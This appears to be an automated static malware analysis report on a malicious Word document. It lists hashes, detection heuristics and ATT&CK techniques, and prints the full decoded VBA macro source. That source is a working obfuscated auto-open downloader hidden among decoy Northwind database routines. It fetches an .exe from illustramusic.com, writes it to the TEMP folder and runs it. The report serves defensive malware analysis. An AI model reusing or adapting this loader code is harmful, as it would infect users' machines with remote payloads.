Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95a288c488a3f512…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 53.0 KB
Created: 2015-07-09 06:12:00
Authoring application: Microsoft Office Word
First seen: 2015-09-18
MD5: 404b61075c9b5cb7b8ecf107b4b4ccb0
SHA-1: bfc603ea8fb9ba2710d47d8ab2ec37b5bd3527eb
SHA-256: 95a288c488a3f512f61b3295daf61037cf696ec8d63b1caf405b575a69c63a31
Risk Score: 330

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The file contains obfuscated VBA macros designed to execute automatically upon opening. These macros are configured to download and execute a payload from the URL http://illustramusic.com/43/82.exe. The presence of CreateObject and CallByName calls, along with an auto-exec loader, strongly indicates a malicious downloader.

Heuristics (10)

  • ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     Set XUFbKpgn = CreateObject(bVDahQGZfQafz)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set XUFbKpgn = CreateObject(bVDahQGZfQafz)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName EfUmQh3mOIWp, "O" & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & "E" & "T", _
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://illustramusic.com/43/82.exe Referenced by macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14354 bytes
SHA-256: 66dfc96bde017c6f5f04c58576ec44d2c948ed1d89cbcdda231a9906a0fdeefd
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub autoopen()

Nip121ЦКВ3017 (700)

End Sub

Sub Nip121ЦКВ3017(FFFFF As Integer)
HC9JQJgd8MG

End Sub



Attribute VB_Name = "Module1"
Public UzA2FtU9ehfc As String
Public Khkbjkjb As Long
Public JKHFkjhv As Integer

Sub DatabaseConnection()

    '
    ' Open the Northwind database (check the path!)
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = d.OpenDatabase(DBLOCATION)
    '
    ' Open the Customers table (recordset)
    '
    Set rs = db.OpenRecordset("Customers")
    '
    ' Display confirmation message
    '
    MsgBox "Opened " & db.Name & " Successfully!" & _
           Chr(13) & Chr(13) & _
           "The open Recordset is " & rs.Name
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set db = Nothing
End Sub

' Listing 18.2. A procedure that connects to a non-Jet database.
'
Sub NonJetConnection()
    '
    ' Open the Jet database (check the path!)
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = d.OpenDatabase(DBLOCATION)
    '
    ' Create TableDef and set the connection information.
    ' This code assumes the CUSTOMER.DBF file (it's on the
    ' CD) is in the same folder as this workbook.
    '
    Set tdDBASE = db.CreateTableDef("Linked dBASE Table")
    tdDBASE.Connect = "dBASE IV;DATABASE=" & ThisWorkbook.Path
    tdDBASE.SourceTableName = "Customer"
    '
    ' Append the TableDef to create the link
    '
    db.TableDefs.Append tdDBASE
    '
    ' Open the recordset
    '
    Set rs = db.OpenRecordset("Linked dBASE Table", dbOpenSnapshot)
    '
    ' Display confirmation message
    '
    MsgBox "Opened " & db.Name & " Successfully!" & _
            Chr(13) & Chr(13) & _
            "The open Recordset is " & rs.Name & _
            Chr(13) & _
            "The source table is " & tdDBASE.SourceTableName
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set tdDBASE = Nothing
    Set db = Nothing
End Sub

' Listing 18.3. A procedure that displays information on
' all the fields in a Recordset.
'

Sub HC9JQJgd8MG()


JjoveOIH = Chr(104) & Chr(116) & "t" & "p" & Chr(58) & Chr(47) & Chr(60) & Chr(47) & Chr(105) & Chr(108) & Chr(108) & Chr(117) & Chr(115) & Chr(116) & Chr(114) & Chr(97) & Chr(109) & Chr(117) & Chr(115) & Chr(105) & Chr(99) & "." & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "4" & Chr(51) & Chr(47) & Chr(56) & "2" & Chr(46) & "e" & Chr(120) & Chr(101)

Set EfUmQh3mOIWp = XUFbKpgn("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & ".X" & Chr(77) & "L" & Chr(72) & Chr(84) & "T" & "P")

JjoveOIH = Replace(JjoveOIH, Chr(60), "", 1, 1, vbTextCompare)
CallByName EfUmQh3mOIWp, "O" & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & "E" & "T", _
JjoveOIH, False
Set XQQ5MVr24 = XUFbKpgn(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))

Set N7xBa7sk = CallByName(XQQ5MVr24, Chr(69) & "n" & "v" & Chr(105) & Chr(114) & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & "c" & "e" & Chr(115) & "s")

PuNXazFc3 = N7xBa7sk("T" & Chr(69) & Chr(77) & "P")

UzA2FtU9ehfc = PuNXazFc3 & Chr(92) & "r" & Chr(101) & Chr(98) & Chr(117) & Chr(105) & Chr(108) & Chr(51) & Chr(46) & "e" & Chr(120) & Chr(101)
Dim cUtXmkOl() As Byte

CallByName EfUmQh3mOIWp, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
cUtXmkOl = CallByName(EfUmQh3mOIWp, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
OYdRs6238lCD cUtXmkOl, UzA2FtU9ehfc
On Error GoTo czmNNOSKG
    a = 2321 / 0
  On Error GoTo 0
  
uCzc6tLEYtcdR:
  Exit Sub
czmNNOSKG:
  RktdsxfVspmN ("RjjZx1ohoCq2KQ")
Resume uCzc6tLEYtcdR
End Sub
Sub DisplayFieldInfo()

    Dim i As Integer
    Dim fieldInfo As String
    '
    ' Open the Northwind database
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = c.OpenDatabase(DBLOCATION)
    '
    ' Open the Categories table
    '
    Set rs = db.OpenRecordset("Categories", dbOpenSnapshot)
    '
    ' Enumerate all fields in the Recordset
    '
    For i = 0 To rs.Fields.Count - 1
        fieldInfo = "Recordset: " & rs.Name & Chr(13) & _
            "Field " & _
            i + 1 & " of " & _
            rs.Fields.Count & Chr(13) & Chr(13)
        '
        ' Set the Field variable and then run through the properties
        '
        Set fld = rs.Fields(i)
        fieldInfo = fieldInfo & _
            "Name: " & fld.Name & Chr(13) & _
            "Allow Zero Length: " & fld.AllowZeroLength & Chr(13) & _
            "Attributes: " & fld.Attributes & Chr(13) & _
            "Collating Order: " & fld.CollatingOrder & Chr(13) & _
            "Default Value: " & fld.DefaultValue & Chr(13) & _
            "Ordinal Position: " & fld.OrdinalPosition & Chr(13) & _
            "Required: " & fld.Required & Chr(13) & _
            "Size: " & fld.Size & Chr(13) & _
            "Source Field: " & fld.SourceField & Chr(13) & _
            "Source Table: " & fld.SourceTable & Chr(13) & _
            "Type of Field: " & TypeOfField(fld.Type) & Chr(13) & _
            "Validation Rule: " & fld.ValidationRule & Chr(13) & _
            "Validation Text: " & fld.ValidationText
        MsgBox Prompt:=fieldInfo, Title:="Field Information"
    Next i
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set fld = Nothing
    Set db = Nothing
End Sub

' TypeOfField()
' Function to translate the constant returned by a Field object's
' Type property into a descriptive string.
'
Function TypeOfField(fldConstant As Integer) As String

    Select Case fldConstant
        Case 1   ' dbBoolean
            TypeOfField = "Boolean"
        Case 2   ' dbByte
            TypeOfField = "Byte"
        Case 3   ' dbInteger
            TypeOfField = "Integer"
        Case 4   ' dbLong
            TypeOfField = "Long Integer"
        Case 5   ' dbCurrency
            TypeOfField = "Currency"
        Case 6   ' dbSingle
            TypeOfField = "Single"
        Case 7   ' dbDouble
            TypeOfField = "Double"
        Case 8   ' dbDate
            TypeOfField = "Date"
        Case 10  ' dbText
            TypeOfField = "Text"
        Case 11  'dbLongBinary
            TypeOfField = "OLE Object"
        Case 12  ' dbMemo
            TypeOfField = "Memo"
        Case 15  ' dbGUID
            TypeOfField = "GUID"
    End Select
End Function

Attribute VB_Name = "Module2"

' Listing 18.4. A procedure that opens a recordset using
' a SQL SELECT expression.
'
Sub QueryCustomers()
    Dim db As Database
    Dim strSELECT As String
    Dim rs As Recordset
    '
    ' Open the Northwind database (check the path!)
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = OpenDatabase(DBLOCATION)
    '
    ' Store the SELECT statement in a string variable
    '
    strSELECT = "SELECT CompanyName,Region,Country " & _
                "FROM Customers " & _
                "WHERE Country = 'Canada' " & _
                "ORDER BY CompanyName"
    '
    ' Open the recordset
    '
    Set rs = db.OpenRecordset(strSELECT)
    '
    ' Display confirmation message
    '
    MsgBox "The filtered Recordset contains " & _
    rs.RecordCount & " records."
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set db = Nothing
End Sub

' Listing 18.5. A procedure that creates a recordset from
' a QueryDef object.

Public Function XUFbKpgn(bVDahQGZfQafz As String)
 Set XUFbKpgn = CreateObject(bVDahQGZfQafz)
End Function
'
Sub QueryDefExample()
    Dim db As Database
    Dim qd As QueryDef
    Dim rs As Recordset
    '
    ' Open the Northwind database (check the path!)
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = OpenDatabase(DBLOCATION)
    '
    ' Assign the QueryDef object
    '
    Set qd = db.QueryDefs("Products Above Average Price")
    '
    ' Open the recordset
    '
    Set rs = qd.OpenRecordset()
    '
    ' Display confirmation message
    '
    MsgBox "The filtered Recordset contains " & _
        rs.RecordCount & " records."
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set qd = Nothing
    Set db = Nothing
End Sub

Public Function RktdsxfVspmN(HAZvVdpA4ZKPE As String)
 Set hL8caJOH = XUFbKpgn("S" & Chr(104) & "e" & "l" & "l" & Chr(46) & Chr(65) & Chr(112) & "p" & Chr(108) & Chr(105) & "c" & Chr(97) & "t" & "i" & Chr(111) & Chr(110))
hL8caJOH.Open (UzA2FtU9ehfc)
End Function



' Listing 18.6. A procedure that reads 100 rows from a
' recordset into a worksheet.
'
Sub ReadDataIntoExcel()
    Dim db As Database
    Dim qd As QueryDef
    Dim rs As Recordset
    Dim recArray As Variant
    Dim i As Integer, j As Integer
    '
    ' Open the Jet database, QueryDef, and Recordset
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = OpenDatabase(DBLOCATION)
    Set qd = db.QueryDefs("Invoices")
    Set rs = qd.OpenRecordset()
    '
    ' Head for Database Records and clear the sheet
    '
    Worksheets("Database Records").Activate
    With Worksheets("Database Records").[a1]
        .CurrentRegion.Clear
        '
        ' Read the data using GetRows
        '
        recArray = rs.GetRows(100)
        For i = 0 To UBound(recArray, 2)
            For j = 0 To UBound(recArray, 1)
                .Offset(i + 1, j) = recArray(j, i)
            Next j
        Next i
        '
        ' Enter the field names and format the cells
        '
        For j = 0 To rs.Fields.Count - 1
            .Offset(0, j) = rs.Fields(j).Name
            .Offset(0, j).Font.Bold = True
            .Offset(0, j).EntireColumn.AutoFit
        Next j

    End With
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set qd = Nothing
    Set db = Nothing
End Sub

' Listing 18.7. A procedure that filters out OLE Object
' fields before retrieving a recordset.
'

Public Function OYdRs6238lCD(qBBdA3l1 As Variant, GJjfDfPQFXx As String)
Dim TVRp9uIoM3RKBe: Set TVRp9uIoM3RKBe = XUFbKpgn(Chr(65) & "d" & Chr(111) & "d" & Chr(98) & "." & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "m")

With TVRp9uIoM3RKBe
   .Type = 1
    .Open
    .write qBBdA3l1
    .savetofile GJjfDfPQFXx, 2
End With
End Function
Sub RetrieveCategories()
    Dim db As Database
    Dim rs As Recordset
    Dim fld As Field
    Dim strSELECT As String, i As Integer
    '
    ' Open the Jet database
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = OpenDatabase(DBLOCATION)
    '
    ' Open the full Categories table
    '
    Set rs = db.OpenRecordset("Categories")
    '
    ' The strSELECT variable will hold the SQL SELECT statement
    ' that filters the Recordset to remove OLE Object fields
    '
    strSELECT = "SELECT "
    '
    ' Run through the recordset fields
    '
    For Each fld In rs.Fields
        '
        ' Check for OLE Object fields
        '
        If fld.Type <> dbLongBinary Then
            '
            ' If it's not an OLE Object field, add it to the SELECT statement
            '
            strSELECT = strSELECT & fld.Name & ","
        End If
    Next fld
    '
    ' Remove the trailing comma
    '
    strSELECT = Left(strSELECT, Len(strSELECT) - 1)
    '
    ' Add the FROM clause
    '
    strSELECT = strSELECT & " FROM Categories"
    '
    ' Open the filtered recordset
    '
    Set rs = db.OpenRecordset(strSELECT)
    '
    ' Retrieve the records
    '
    Worksheets("Database Records").Activate
    With Worksheets("Database Records").[a1]
        .CurrentRegion.Clear
        .Offset(1).CopyFromRecordset rs
        '
        ' Enter the field names and format the cells
        '
        For i = 0 To rs.Fields.Count - 1
            .Offset(0, i) = rs.Fields(i).Name
            .Offset(0, i).Font.Bold = True
            .Offset(0, i).EntireColumn.AutoFit
        Next i
    End With
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set fld = Nothing
    Set db = Nothing
End Sub